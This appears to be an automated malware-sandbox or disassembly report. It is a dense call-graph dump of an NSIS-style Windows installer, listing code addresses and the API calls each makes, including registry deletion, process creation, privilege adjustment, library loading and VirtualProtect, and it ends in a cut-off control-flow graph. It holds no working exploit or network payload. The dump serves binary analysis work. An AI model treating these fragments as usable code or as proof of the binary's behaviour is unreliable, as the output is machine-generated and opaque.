4159 40248e 4158->4159 4159->4147 4160->4150 5339 402104 5340 402c41 17 API calls 5339->5340 5341 40210b 5340->5341 5342 402c41 17 API calls 5341->5342 5343 402115 5342->5343 5344 402c41 17 API calls 5343->5344 5345 40211f 5344->5345 5346 402c41 17 API calls 5345->5346 5347 402129 5346->5347 5348 402c41 17 API calls 5347->5348 5349 402133 5348->5349 5350 402172 CoCreateInstance 5349->5350 5351 402c41 17 API calls 5349->5351 5354 402191 5350->5354 5351->5350 5352 401423 24 API calls 5353 402250 5352->5353 5354->5352 5354->5353 5355 401f06 5356 402c41 17 API calls 5355->5356 5357 401f0c 5356->5357 5358 405322 24 API calls 5357->5358 5359 401f16 5358->5359 5360 4058a3 2 API calls 5359->5360 5361 401f1c 5360->5361 5362 401f3f CloseHandle 5361->5362 5363 406745 5 API calls 5361->5363 5365 40288b 5361->5365 5362->5365 5366 401f31 5363->5366 5366->5362 5368 406201 wsprintfW 5366->5368 5368->5362 5369 40190c 5370 401943 5369->5370 5371 402c41 17 API calls 5370->5371 5372 401948 5371->5372 5373 4059cc 67 API calls 5372->5373 5374 401951 5373->5374 5375 40230c 5376 402314 5375->5376 5377 40231a 5375->5377 5378 402c41 17 API calls 5376->5378 5379 402328 5377->5379 5380 402c41 17 API calls 5377->5380 5378->5377 5381 402336 5379->5381 5382 402c41 17 API calls 5379->5382 5380->5379 5383 402c41 17 API calls 5381->5383 5382->5381 5384 40233f WritePrivateProfileStringW 5383->5384 5385 401f8c 5386 402c41 17 API calls 5385->5386 5387 401f93 5386->5387 5388 406694 5 API calls 5387->5388 5389 401fa2 5388->5389 5390 401fbe GlobalAlloc 5389->5390 5395 402026 5389->5395 5391 401fd2 5390->5391 5390->5395 5392 406694 5 API calls 5391->5392 5393 401fd9 5392->5393 5394 406694 5 API calls 5393->5394 5396 401fe3 5394->5396 5396->5395 5400 406201 wsprintfW 5396->5400 5398 402018 5401 406201 wsprintfW 5398->5401 5400->5398 5401->5395 5402 704d1000 5405 704d101b 5402->5405 5406 704d1516 GlobalFree 5405->5406 5407 704d1020 5406->5407 5408 704d1024 5407->5408 5409 704d1027 GlobalAlloc 5407->5409 5410 704d153d 3 API calls 5408->5410 5409->5408 5411 704d1019 5410->5411 4193 40238e 4194 4023c1 4193->4194 4195 402396 4193->4195 4197 402c41 17 API calls 4194->4197 4196 402c81 17 API calls 4195->4196 4198 40239d 4196->4198 4199 4023c8 4197->4199 4201 4023a7 4198->4201 4202 4023d5 4198->4202 4205 402cff 4199->4205 4203 402c41 17 API calls 4201->4203 4204 4023ae RegDeleteValueW RegCloseKey 4203->4204 4204->4202 4206 402d0c 4205->4206 4207 402d13 4205->4207 4206->4202 4207->4206 4209 402d44 4207->4209 4210 406127 RegOpenKeyExW 4209->4210 4211 402d72 4210->4211 4212 402dec 4211->4212 4216 402d76 4211->4216 4212->4206 4213 402d98 RegEnumKeyW 4214 402daf RegCloseKey 4213->4214 4213->4216 4217 406694 5 API calls 4214->4217 4215 402dd0 RegCloseKey 4215->4212 4216->4213 4216->4214 4216->4215 4218 402d44 6 API calls 4216->4218 4219 402dbf 4217->4219 4218->4216 4220 402de0 RegDeleteKeyW 4219->4220 4221 402dc3 4219->4221 4220->4212 4221->4212 4276 40338f SetErrorMode GetVersion 4277 4033ce 4276->4277 4278 4033d4 4276->4278 4279 406694 5 API calls 4277->4279 4280 406624 3 API calls 4278->4280 4279->4278 4281 4033ea lstrlenA 4280->4281 4281->4278 4282 4033fa 4281->4282 4283 406694 5 API calls 4282->4283 4284 403401 4283->4284 4285 406694 5 API calls 4284->4285 4286 403408 4285->4286 4287 406694 5 API calls 4286->4287 4288 403414 #17 OleInitialize SHGetFileInfoW 4287->4288 4366 4062ba lstrcpynW 4288->4366 4291 403460 GetCommandLineW 4367 4062ba lstrcpynW 4291->4367 4293 403472 4294 405bbc CharNextW 4293->4294 4295 403497 CharNextW 4294->4295 4296 4035c1 GetTempPathW 4295->4296 4307 4034b0 4295->4307 4368 40335e 4296->4368 4298 4035d9 4299 403633 DeleteFileW 4298->4299 4300 4035dd GetWindowsDirectoryW lstrcatW 4298->4300 4378 402edd GetTickCount GetModuleFileNameW 4299->4378 4303 40335e 12 API calls 4300->4303 4301 405bbc CharNextW 4301->4307 4304 4035f9 4303->4304 4304->4299 4306 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4304->4306 4305 403647 4311 4036ea 4305->4311 4315 405bbc CharNextW 4305->4315 4362 4036fa 4305->4362 4308 40335e 12 API calls 4306->4308 4307->4301 4309 4035ac 4307->4309 4310 4035aa 4307->4310 4313 40362b 4308->4313 4462 4062ba lstrcpynW 4309->4462 4310->4296 4406 4039aa 4311->4406 4313->4299 4313->4362 4332 403666 4315->4332 4318 403834 4321 4038b8 ExitProcess 4318->4321 4322 40383c GetCurrentProcess OpenProcessToken 4318->4322 4319 403714 4320 405920 MessageBoxIndirectW 4319->4320 4324 403722 ExitProcess 4320->4324 4327 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4322->4327 4328 403888 4322->4328 4325 4036c4 4329 405c97 18 API calls 4325->4329 4326 40372a 4330 40588b 5 API calls 4326->4330 4327->4328 4331 406694 5 API calls 4328->4331 4333 4036d0 4329->4333 4334 40372f lstrcatW 4330->4334 4335 40388f 4331->4335 4332->4325 4332->4326 4333->4362 4463 4062ba lstrcpynW 4333->4463 4336 403740 lstrcatW 4334->4336 4337 40374b lstrcatW lstrcmpiW 4334->4337 4338 4038a4 ExitWindowsEx 4335->4338 4341 4038b1 4335->4341 4336->4337 4340 403767 4337->4340 4337->4362 4338->4321 4338->4341 4343 403773 4340->4343 4344 40376c 4340->4344 4477 40140b 4341->4477 4342 4036df 4464 4062ba lstrcpynW 4342->4464 4348 40586e 2 API calls 4343->4348 4347 4057f1 4 API calls 4344->4347 4349 403771 4347->4349 4350 403778 SetCurrentDirectoryW 4348->4350 4349->4350 4351 403793 4350->4351 4352 403788 4350->4352 4473 4062ba lstrcpynW 4351->4473 4472 4062ba lstrcpynW 4352->4472 4355 4037a1 4356 4062dc 17 API calls 4355->4356 4359 403828 4355->4359 4361 406080 36 API calls 4355->4361 4363 4062dc 17 API calls 4355->4363 4365 403813 CloseHandle 4355->4365 4474 4058a3 CreateProcessW 4355->4474 4357 4037d2 DeleteFileW 4356->4357 4357->4355 4358 4037df CopyFileW 4357->4358 4358->4355 4360 406080 36 API calls 4359->4360 4360->4362 4361->4355 4465 4038d0 4362->4465 4363->4355 4365->4355 4366->4291 4367->4293 4369 40654e 5 API calls 4368->4369 4371 40336a 4369->4371 4370 403374 4370->4298 4371->4370 4372 405b8f 3 API calls 4371->4372 4373 40337c 4372->4373 4374 40586e 2 API calls 4373->4374 4375 403382 4374->4375 4480 405ddf 4375->4480 4484 405db0 GetFileAttributesW CreateFileW 4378->4484 4380 402f1d 4399 402f2d 4380->4399 4485 4062ba lstrcpynW 4380->4485 4382 402f43 4383 405bdb 2 API calls 4382->4383 4384 402f49 4383->4384 4486 4062ba lstrcpynW 4384->4486 4386 402f54 GetFileSize 4387 403050 4386->4387 4405 402f6b 4386->4405 4487 402e79 4387->4487 4389 403059 4391 403089 GlobalAlloc 4389->4391 4389->4399 4499 403347 SetFilePointer 4389->4499 4390 403331 ReadFile 4390->4405 4498 403347 SetFilePointer 4391->4498 4392 4030bc 4396 402e79 6 API calls 4392->4396 4395 4030a4 4398 403116 31 API calls 4395->4398 4396->4399 4397 403072 4400 403331 ReadFile 4397->4400 4403 4030b0 4398->4403 4399->4305 4402 40307d 4400->4402 4401 402e79 6 API calls 4401->4405 4402->4391 4402->4399 4403->4399 4403->4403 4404 4030ed SetFilePointer 4403->4404 4404->4399 4405->4387 4405->4390 4405->4392 4405->4399 4405->4401 4407 406694 5 API calls 4406->4407 4408 4039be 4407->4408 4409 4039c4 4408->4409 4410 4039d6 4408->4410 4512 406201 wsprintfW 4409->4512 4411 406188 3 API calls 4410->4411 4412 403a06 4411->4412 4414 403a25 lstrcatW 4412->4414 4416 406188 3 API calls 4412->4416 4415 4039d4 4414->4415 4504 403c80 4415->4504 4416->4414 4419 405c97 18 API calls 4420 403a57 4419->4420 4421 403aeb 4420->4421 4423 406188 3 API calls 4420->4423 4422 405c97 18 API calls 4421->4422 4424 403af1 4422->4424 4425 403a89 4423->4425 4426 403b01 LoadImageW 4424->4426 4427 4062dc 17 API calls 4424->4427 4425->4421 4430 403aaa lstrlenW 4425->4430 4433 405bbc CharNextW 4425->4433 4428 403ba7 4426->4428 4429 403b28 RegisterClassW 4426->4429 4427->4426 4432 40140b 2 API calls 4428->4432 4431 403b5e SystemParametersInfoW CreateWindowExW 4429->4431 4461 403bb1 4429->4461 4434 403ab8 lstrcmpiW 4430->4434 4435 403ade 4430->4435 4431->4428 4436 403bad 4432->4436 4438 403aa7 4433->4438 4434->4435 4439 403ac8 GetFileAttributesW 4434->4439 4437 405b8f 3 API calls 4435->4437 4440 403c80 18 API calls 4436->4440 4436->4461 4441 403ae4 4437->4441 4438->4430 4442 403ad4 4439->4442 4443 403bbe 4440->4443 4513 4062ba lstrcpynW 4441->4513 4442->4435 4445 405bdb 2 API calls 4442->4445 4446 403bca ShowWindow 4443->4446 4447 403c4d 4443->4447 4445->4435 4449 406624 3 API calls 4446->4449 4514 4053f5 OleInitialize 4447->4514 4451 403be2 4449->4451 4450 403c53 4452 403c57 4450->4452 4453 403c6f 4450->4453 4454 403bf0 GetClassInfoW 4451->4454 4456 406624 3 API calls 4451->4456 4459 40140b 2 API calls 4452->4459 4452->4461 4455 40140b 2 API calls 4453->4455 4457 403c04 GetClassInfoW RegisterClassW 4454->4457 4458 403c1a DialogBoxParamW 4454->4458 4455->4461 4456->4454 4457->4458 4460 40140b 2 API calls 4458->4460 4459->4461 4460->4461 4461->4362 4462->4310 4463->4342 4464->4311 4466 4038e8 4465->4466 4467 4038da CloseHandle 4465->4467 4532 403915 4466->4532 4467->4466 4470 4059cc 67 API calls 4471 403703 OleUninitialize 4470->4471 4471->4318 4471->4319 4472->4351 4473->4355 4475 4058e2 4474->4475 4476 4058d6 CloseHandle 4474->4476 4475->4355 4476->4475 4478 401389 2 API calls 4477->4478 4479 401420 4478->4479 4479->4321 4481 405dec GetTickCount GetTempFileNameW 4480->4481 4482 405e22 4481->4482 4483 40338d 4481->4483 4482->4481 4482->4483 4483->4298 4484->4380 4485->4382 4486->4386 4488 402e82 4487->4488 4489 402e9a 4487->4489 4490 402e92 4488->4490 4491 402e8b DestroyWindow 4488->4491 4492 402ea2 4489->4492 4493 402eaa GetTickCount 4489->4493 4490->4389 4491->4490 4500 4066d0 4492->4500 4495 402eb8 CreateDialogParamW ShowWindow 4493->4495 4496 402edb 4493->4496 4495->4496 4496->4389 4498->4395 4499->4397 4501 4066ed PeekMessageW 4500->4501 4502 4066e3 DispatchMessageW 4501->4502 4503 402ea8 4501->4503 4502->4501 4503->4389 4505 403c94 4504->4505 4521 406201 wsprintfW 4505->4521 4507 403d05 4522 403d39 4507->4522 4509 403a35 4509->4419 4510 403d0a 4510->4509 4511 4062dc 17 API calls 4510->4511 4511->4510 4512->4415 4513->4421 4525 40427d 4514->4525 4516 405418 4520 40543f 4516->4520 4528 401389 4516->4528 4517 40427d SendMessageW 4518 405451 OleUninitialize 4517->4518 4518->4450 4520->4517 4521->4507 4523 4062dc 17 API calls 4522->4523 4524 403d47 SetWindowTextW 4523->4524 4524->4510 4526 404295 4525->4526 4527 404286 SendMessageW 4525->4527 4526->4516 4527->4526 4530 401390 4528->4530 4529 4013fe 4529->4516 4530->4529 4531 4013cb MulDiv SendMessageW 4530->4531 4531->4530 4533 403923 4532->4533 4534 4038ed 4533->4534 4535 403928 FreeLibrary GlobalFree 4533->4535 4534->4470 4535->4534 4535->4535 5412 40190f 5413 402c41 17 API calls 5412->5413 5414 401916 5413->5414 5415 405920 MessageBoxIndirectW 5414->5415 5416 40191f 5415->5416 5417 401491 5418 405322 24 API calls 5417->5418 5419 401498 5418->5419 5420 401d14 5421 402c1f 17 API calls 5420->5421 5422 401d1b 5421->5422 5423 402c1f 17 API calls 5422->5423 5424 401d27 GetDlgItem 5423->5424 5425 402592 5424->5425 4727 405296 4728 4052a6 4727->4728 4729 4052ba 4727->4729 4730 405303 4728->4730 4731 4052ac 4728->4731 4732 4052c2 IsWindowVisible 4729->4732 4739 4052e2 4729->4739 4734 405308 CallWindowProcW 4730->4734 4735 40427d SendMessageW 4731->4735 4732->4730 4733 4052cf 4732->4733 4741 404bec SendMessageW 4733->4741 4737 4052b6 4734->4737 4735->4737 4739->4734 4746 404c6c 4739->4746 4742 404c4b SendMessageW 4741->4742 4743 404c0f GetMessagePos ScreenToClient SendMessageW 4741->4743 4744 404c43 4742->4744 4743->4744 4745 404c48 4743->4745 4744->4739 4745->4742 4755 4062ba lstrcpynW 4746->4755 4748 404c7f 4756 406201 wsprintfW 4748->4756 4750 404c89 4751 40140b 2 API calls 4750->4751 4752 404c92 4751->4752 4757 4062ba lstrcpynW 4752->4757 4754 404c99 4754->4730 4755->4748 4756->4750 4757->4754 5426 402598 5427 4025c7 5426->5427 5428 4025ac 5426->5428 5430 4025fb 5427->5430 5431 4025cc 5427->5431 5429 402c1f 17 API calls 5428->5429 5436 4025b3 5429->5436 5433 402c41 17 API calls 5430->5433 5432 402c41 17 API calls 5431->5432 5434 4025d3 WideCharToMultiByte lstrlenA 5432->5434 5435 402602 lstrlenW 5433->5435 5434->5436 5435->5436 5437 40262f 5436->5437 5439 405e91 5 API calls 5436->5439 5440 402645 5436->5440 5438 405e62 WriteFile 5437->5438 5437->5440 5438->5440 5439->5437 4893 404c9e GetDlgItem GetDlgItem 4894 404cf0 7 API calls 4893->4894 4897 404f09 4893->4897 4895 404d93 DeleteObject 4894->4895 4896 404d86 SendMessageW 4894->4896 4898 404d9c 4895->4898 4896->4895 4903 404fce 4897->4903 4909 404f69 4897->4909 4914 404fed 4897->4914 4899 404dab 4898->4899 4900 404dd3 4898->4900 4902 4062dc 17 API calls 4899->4902 4904 404231 18 API calls 4900->4904 4901 405099 4906 4050a3 SendMessageW 4901->4906 4907 4050ab 4901->4907 4908 404db5 SendMessageW SendMessageW 4902->4908 4903->4914 4915 404fdf SendMessageW 4903->4915 4910 404de7 4904->4910 4905 405281 4913 404298 8 API calls 4905->4913 4906->4907 4920 4050c4 4907->4920 4921 4050bd ImageList_Destroy 4907->4921 4925 4050d4 4907->4925 4908->4898 4916 404bec 5 API calls 4909->4916 4911 404231 18 API calls 4910->4911 4929 404df5 4911->4929 4912 405046 SendMessageW 4912->4905 4918 40505b SendMessageW 4912->4918 4919 40528f 4913->4919 4914->4901 4914->4905 4914->4912 4915->4914 4928 404f7a 4916->4928 4917 405243 4917->4905 4926 405255 ShowWindow GetDlgItem ShowWindow 4917->4926 4924 40506e 4918->4924 4922 4050cd GlobalFree 4920->4922 4920->4925 4921->4920 4922->4925 4923 404eca GetWindowLongW SetWindowLongW 4927 404ee3 4923->4927 4934 40507f SendMessageW 4924->4934 4925->4917 4939 404c6c 4 API calls 4925->4939 4944 40510f 4925->4944 4926->4905 4930 404f01 4927->4930 4931 404ee9 ShowWindow 4927->4931 4928->4903 4929->4923 4933 404e45 SendMessageW 4929->4933 4935 404ec4 4929->4935 4937 404e81 SendMessageW 4929->4937 4938 404e92 SendMessageW 4929->4938 4950 404266 SendMessageW 4930->4950 4949 404266 SendMessageW 4931->4949 4933->4929 4934->4901 4935->4923 4935->4927 4937->4929 4938->4929 4939->4944 4940 404efc 4940->4905 4941 405219 InvalidateRect 4941->4917 4942 40522f 4941->4942 4951 404ba7 4942->4951 4943 40513d SendMessageW 4945 405153 4943->4945 4944->4943 4944->4945 4945->4941 4946 4051b4 4945->4946 4948 4051c7 SendMessageW SendMessageW 4945->4948 4946->4948 4948->4945 4949->4940 4950->4897 4954 404ade 4951->4954 4953 404bbc 4953->4917 4955 404af7 4954->4955 4956 4062dc 17 API calls 4955->4956 4957 404b5b 4956->4957 4958 4062dc 17 API calls 4957->4958 4959 404b66 4958->4959 4960 4062dc 17 API calls 4959->4960 4961 404b7c lstrlenW wsprintfW SetDlgItemTextW 4960->4961 4961->4953 4962 704d2993 4963 704d29e3 4962->4963 4964 704d29a3 VirtualProtect 4962->4964 4964->4963 5441 40149e 5442 4022f7 5441->5442 5443 4014ac PostQuitMessage 5441->5443 5443->5442 5444 401c1f 5445 402c1f 17 API calls 5444->5445 5446 401c26 5445->5446 5447 402c1f 17 API calls 5446->5447 5448 401c33 5447->5448 5449 401c48 5448->5449 5450 402c41 17 API calls 5448->5450 5451 401c58 5449->5451 5452 402c41 17 API calls 5449->5452 5450->5449 5453 401c63 5451->5453 5454 401caf 5451->5454 5452->5451 5455 402c1f 17 API calls 5453->5455 5456 402c41 17 API calls 5454->5456 5457 401c68 5455->5457 5458 401cb4 5456->5458 5459 402c1f 17 API calls 5457->5459 5460 402c41 17 API calls 5458->5460 5461 401c74 5459->5461 5462 401cbd FindWindowExW 5460->5462 5463 401c81 SendMessageTimeoutW 5461->5463 5464 401c9f SendMessageW 5461->5464 5465 401cdf 5462->5465 5463->5465 5464->5465 5466 402aa0 SendMessageW 5467 402aba InvalidateRect 5466->5467 5468 402ac5 5466->5468 5467->5468 5469 402821 5470 402827 5469->5470 5471 402ac5 5470->5471 5472 40282f FindClose 5470->5472 5472->5471 5473 4043a1 lstrlenW 5474 4043c0 5473->5474 5475 4043c2 WideCharToMultiByte 5473->5475 5474->5475 5476 404722 5477 40474e 5476->5477 5478 40475f 5476->5478 5537 405904 GetDlgItemTextW 5477->5537 5480 40476b GetDlgItem 5478->5480 5486 4047ca 5478->5486 5481 40477f 5480->5481 5485 404793 SetWindowTextW 5481->5485 5489 405c3a 4 API calls 5481->5489 5482 4048ae 5535 404a5d 5482->5535 5539 405904 GetDlgItemTextW 5482->5539 5483 404759 5484 40654e 5 API calls 5483->5484 5484->5478 5490 404231 18 API calls 5485->5490 5486->5482 5491 4062dc 17 API calls 5486->5491 5486->5535 5488 404298 8 API calls 5493 404a71 5488->5493 5494 404789 5489->5494 5495 4047af 5490->5495 5496 40483e SHBrowseForFolderW 5491->5496 5492 4048de 5497 405c97 18 API calls 5492->5497 5494->5485 5501 405b8f 3 API calls 5494->5501 5498 404231 18 API calls 5495->5498 5496->5482 5499 404856 CoTaskMemFree 5496->5499 5500 4048e4 5497->5500 5502 4047bd 5498->5502 5503 405b8f 3 API calls 5499->5503 5540 4062ba lstrcpynW 5500->5540 5501->5485 5538 404266 SendMessageW 5502->5538 5505 404863 5503->5505 5508 40489a SetDlgItemTextW 5505->5508 5512 4062dc 17 API calls 5505->5512 5507 4047c3 5510 406694 5 API calls 5507->5510 5508->5482 5509 4048fb 5511 406694 5 API calls 5509->5511 5510->5486 5518 404902 5511->5518 5513 404882 lstrcmpiW 5512->5513 5513->5508 5515 404893 lstrcatW 5513->5515 5514 404943 5541 4062ba lstrcpynW 5514->5541 5515->5508 5517 40494a 5519 405c3a 4 API calls 5517->5519 5518->5514 5523 405bdb 2 API calls 5518->5523 5524 40499b 5518->5524 5520 404950 GetDiskFreeSpaceW 5519->5520 5522 404974 MulDiv 5520->5522 5520->5524 5522->5524 5523->5518 5525 404ba7 20 API calls 5524->5525 5534 404a0c 5524->5534 5528 4049f9 5525->5528 5526 40140b 2 API calls 5527 404a2f 5526->5527 5542 404253 EnableWindow 5527->5542 5530 404a0e SetDlgItemTextW 5528->5530 5531 4049fe 5528->5531 5530->5534 5532 404ade 20 API calls 5531->5532 5532->5534 5533 404a4b 5533->5535 5536 40467b SendMessageW 5533->5536 5534->5526 5534->5527 5535->5488 5536->5535 5537->5483 5538->5507 5539->5492 5540->5509 5541->5517 5542->5533 4088 4015a3 4089 402c41 17 API calls 4088->4089 4090 4015aa SetFileAttributesW 4089->4090 4091 4015bc 4090->4091 5543 4028ad 5544 402c41 17 API calls 5543->5544 5546 4028bb 5544->5546 5545 4028d1 5548 405d8b 2 API calls 5545->5548 5546->5545 5547 402c41 17 API calls 5546->5547 5547->5545 5549 4028d7 5548->5549 5571 405db0 GetFileAttributesW CreateFileW 5549->5571 5551 4028e4 5552 4028f0 GlobalAlloc 5551->5552 5553 402987 5551->5553 5556 402909 5552->5556 5557 40297e CloseHandle 5552->5557 5554 4029a2 5553->5554 5555 40298f DeleteFileW 5553->5555 5555->5554 5572 403347 SetFilePointer 5556->5572 5557->5553 5559 40290f 5560 403331 ReadFile 5559->5560 5561 402918 GlobalAlloc 5560->5561 5562 402928 5561->5562 5563 40295c 5561->5563 5564 403116 31 API calls 5562->5564 5565 405e62 WriteFile 5563->5565 5566 402935 5564->5566 5567 402968 GlobalFree 5565->5567 5569 402953 GlobalFree 5566->5569 5568 403116 31 API calls 5567->5568 5570 40297b 5568->5570 5569->5563 5570->5557 5571->5551 5572->5559 5573 704d103d 5574 704d101b 5 API calls 5573->5574 5575 704d1056 5574->5575 5576 401a30 5577 402c41 17 API calls 5576->5577 5578 401a39 ExpandEnvironmentStringsW 5577->5578 5579 401a4d 5578->5579 5581 401a60 5578->5581 5580 401a52 lstrcmpW 5579->5580 5579->5581 5580->5581 4536 402032 4537 402044 4536->4537 4538 4020f6 4536->4538 4539 402c41 17 API calls 4537->4539 4540 401423 24 API calls 4538->4540 4541 40204b 4539->4541 4546 402250 4540->4546 4542 402c41 17 API calls 4541->4542 4543 402054 4542->4543 4544 40206a LoadLibraryExW 4543->4544 4545 40205c GetModuleHandleW 4543->4545 4544->4538 4547 40207b 4544->4547 4545->4544 4545->4547 4559 406703 WideCharToMultiByte 4547->4559 4550 4020c5 4552 405322 24 API calls 4550->4552 4551 40208c 4553 402094 4551->4553 4554 4020ab 4551->4554 4555 40209c 4552->4555 4556 401423 24 API calls 4553->4556 4562 704d1777 4554->4562 4555->4546 4557 4020e8 FreeLibrary 4555->4557 4556->4555 4557->4546 4560 40672d GetProcAddress 4559->4560 4561 402086 4559->4561 4560->4561 4561->4550 4561->4551 4563 704d17aa 4562->4563 4604 704d1b5f 4563->4604 4565 704d17b1 4566 704d18d6 4565->4566 4567 704d17c9 4565->4567 4568 704d17c2 4565->4568 4566->4555 4638 704d2394 4567->4638 4654 704d2352 4568->4654 4573 704d182d 4577 704d187e 4573->4577 4578 704d1833 4573->4578 4574 704d180f 4667 704d2569 4574->4667 4575 704d17df 4580 704d17e5 4575->4580 4585 704d17f0 4575->4585 4576 704d17f8 4591 704d17ee 4576->4591 4664 704d2d37 4576->4664 4583 704d2569 10 API calls 4577->4583 4686 704d15c6 4578->4686 4580->4591 4648 704d2aac 4580->4648 4589 704d186f 4583->4589 4584 704d1815 4678 704d15b4 4584->4678 4658 704d2724 4585->4658 4595 704d18c5 4589->4595 4692 704d252c 4589->4692 4591->4573 4591->4574 4592 704d17f6 4592->4591 4593 704d2569 10 API calls 4593->4589 4595->4566 4597 704d18cf GlobalFree 4595->4597 4597->4566 4601 704d18b1 4601->4595 4696 704d153d wsprintfW 4601->4696 4603 704d18aa FreeLibrary 4603->4601 4699 704d121b GlobalAlloc 4604->4699 4606 704d1b83 4700 704d121b GlobalAlloc 4606->4700 4608 704d1da9 GlobalFree GlobalFree GlobalFree 4609 704d1dc6 4608->4609 4624 704d1e10 4608->4624 4610 704d2192 4609->4610 4618 704d1ddb 4609->4618 4609->4624 4612 704d21b4 GetModuleHandleW 4610->4612 4610->4624 4611 704d1c64 GlobalAlloc 4633 704d1b8e 4611->4633 4615 704d21da 4612->4615 4616 704d21c5 LoadLibraryW 4612->4616 4613 704d1caf lstrcpyW 4617 704d1cb9 lstrcpyW 4613->4617 4614 704d1ccd GlobalFree 4614->4633 4707 704d161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4615->4707 4616->4615 4616->4624 4617->4633 4618->4624 4703 704d122c 4618->4703 4620 704d222c 4622 704d2239 lstrlenW 4620->4622 4620->4624 4708 704d161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4622->4708 4623 704d2064 4706 704d121b GlobalAlloc 4623->4706 4624->4565 4625 704d21ec 4625->4620 4636 704d2216 GetProcAddress 4625->4636 4626 704d20ec 4626->4624 4631 704d2134 lstrcpyW 4626->4631 4629 704d1d0b 4629->4633 4701 704d158f GlobalSize GlobalAlloc 4629->4701 4630 704d1fa5 GlobalFree 4630->4633 4631->4624 4632 704d2253 4632->4624 4633->4608 4633->4611 4633->4613 4633->4614 4633->4617 4633->4623 4633->4624 4633->4626 4633->4629 4633->4630 4634 704d122c 2 API calls 4633->4634 4634->4633 4636->4620 4637 704d206d 4637->4565 4640 704d23ac 4638->4640 4639 704d122c GlobalAlloc lstrcpynW 4639->4640 4640->4639 4642 704d24d5 GlobalFree 4640->4642 4643 704d247f GlobalAlloc CLSIDFromString 4640->4643 4644 704d2454 GlobalAlloc WideCharToMultiByte 4640->4644 4647 704d249e 4640->4647 4710 704d12ba 4640->4710 4642->4640 4645 704d17cf 4642->4645 4643->4642 4644->4642 4645->4575 4645->4576 4645->4591 4647->4642 4714 704d26b8 4647->4714 4649 704d2abe 4648->4649 4650 704d2b63 ReadFile 4649->4650 4653 704d2b81 4650->4653 4652 704d2c4d 4652->4591 4717 704d2a56 4653->4717 4655 704d2367 4654->4655 4656 704d2372 GlobalAlloc 4655->4656 4657 704d17c8 4655->4657 4656->4655 4657->4567 4662 704d2754 4658->4662 4659 704d27ef GlobalAlloc 4663 704d2812 4659->4663 4660 704d2802 4661 704d2808 GlobalSize 4660->4661 4660->4663 4661->4663 4662->4659 4662->4660 4663->4592 4665 704d2d42 4664->4665 4666 704d2d82 GlobalFree 4665->4666 4721 704d121b GlobalAlloc 4667->4721 4669 704d25ec MultiByteToWideChar 4675 704d2573 4669->4675 4670 704d261f lstrcpynW 4670->4675 4671 704d260e StringFromGUID2 4671->4675 4672 704d2632 wsprintfW 4672->4675 4673 704d2656 GlobalFree 4673->4675 4674 704d268b GlobalFree 4674->4584 4675->4669 4675->4670 4675->4671 4675->4672 4675->4673 4675->4674 4676 704d1272 2 API calls 4675->4676 4722 704d12e1 4675->4722 4676->4675 4726 704d121b GlobalAlloc 4678->4726 4680 704d15b9 4681 704d15c6 2 API calls 4680->4681 4682 704d15c3 4681->4682 4683 704d1272 4682->4683 4684 704d127b GlobalAlloc lstrcpynW 4683->4684 4685 704d12b5 GlobalFree 4683->4685 4684->4685 4685->4589 4687 704d15ff lstrcpyW 4686->4687 4688 704d15d2 wsprintfW 4686->4688 4691 704d1618 4687->4691 4688->4691 4691->4593 4693 704d1891 4692->4693 4694 704d253a 4692->4694 4693->4601 4693->4603 4694->4693 4695 704d2556 GlobalFree 4694->4695 4695->4694 4697 704d1272 2 API calls 4696->4697 4698 704d155e 4697->4698 4698->4595 4699->4606 4700->4633 4702 704d15ad 4701->4702 4702->4629 4709 704d121b GlobalAlloc 4703->4709 4705 704d123b lstrcpynW 4705->4624 4706->4637 4707->4625 4708->4632 4709->4705 4711 704d12c1 4710->4711 4712 704d122c 2 API calls 4711->4712 4713 704d12df 4712->4713 4713->4640 4715 704d271c 4714->4715 4716 704d26c6 VirtualAlloc 4714->4716 4715->4647 4716->4715 4718 704d2a61 4717->4718 4719 704d2a66 GetLastError 4718->4719 4720 704d2a71 4718->4720 4719->4720 4720->4652 4721->4675 4723 704d130c 4722->4723 4724 704d12ea 4722->4724 4723->4675 4724->4723 4725 704d12f0 lstrcpyW 4724->4725 4725->4723 4726->4680 5587 402a35 5588 402c1f 17 API calls 5587->5588 5589 402a3b 5588->5589 5590 40288b 5589->5590 5591 402a72 5589->5591 5593 402a4d 5589->5593 5591->5590 5592 4062dc 17 API calls 5591->5592 5592->5590 5593->5590 5595 406201 wsprintfW 5593->5595 5595->5590 5596 401735 5597 402c41 17 API calls 5596->5597 5598 40173c SearchPathW 5597->5598 5599 4029e6 5598->5599 5600 401757 5598->5600 5600->5599 5602 4062ba lstrcpynW 5600->5602 5602->5599 5603 4014b8 5604 4014be 5603->5604 5605 401389 2 API calls 5604->5605 5606 4014c6 5605->5606 5607 401db9 GetDC 5608 402c1f 17 API calls 5607->5608 5609 401dcb GetDeviceCaps MulDiv ReleaseDC 5608->5609 5610 402c1f 17 API calls 5609->5610 5611 401dfc 5610->5611 5612 4062dc 17 API calls 5611->5612 5613 401e39 CreateFontIndirectW 5612->5613 5614 402592 5613->5614 5615 40283b 5616 402843 5615->5616 5617 402847 FindNextFileW 5616->5617 5618 402859 5616->5618 5617->5618 5619 4029e6 5618->5619 5621 4062ba lstrcpynW 5618->5621 5621->5619

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 42 4034f5-40352e 36->42 43 4034dc-4034e4 36->43 54 40359c-40359d 37->54 55 40359e-4035a4 37->55 56 403653-403659 38->56 